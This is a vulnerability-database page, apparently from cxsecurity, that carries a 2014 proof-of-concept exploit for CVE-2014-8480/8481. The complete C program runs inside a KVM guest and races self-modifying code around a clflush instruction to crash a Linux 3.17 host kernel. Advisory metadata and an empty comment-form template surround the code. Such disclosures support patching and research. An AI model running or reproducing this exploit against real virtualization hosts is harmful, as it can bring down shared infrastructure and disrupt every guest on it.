Linux 3.17 guest-triggerable KVM OOPS PoC

2014.10.24

Credit: Andy Lutomirski

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2014-8480 | CVE-2014-8481

CWE: N/A

// KVM clflush sploit (crashes a Linux 3.17 host)
// Copyright (c) 2014 Andy Lutomirski

#include <pthread.h>
#include <err.h>
#include <stdio.h>
#include <stdint.h>
#include <signal.h>
#include <setjmp.h>
#include <string.h>
#include <stdbool.h>
#include <sys/io.h>

asm (".pushsection .wtext, \"awx\"\n"
     "badcode:\n\t"
     "clflush (%rip)\n\t"
     "ret\n"
     ".popsection");

extern volatile unsigned short badcode[];

static void *proc(void *ignored)
{
	while (true)
		badcode[0] = 0xae0f;
	return NULL;
}

int main()
{
	if (iopl(3) != 0)
		err(1, "iopl");

	pthread_t pth;
	pthread_create(&pth, NULL, proc, NULL);

	while (true) {
		badcode[0] = 0x00e4;
		asm volatile ("call badcode" : : : "ax", "flags");
	}
}

References:

http://cxsecurity.com/issue/WLB-2014100149

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Linux 3.17 guest-triggerable KVM OOPS PoC

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.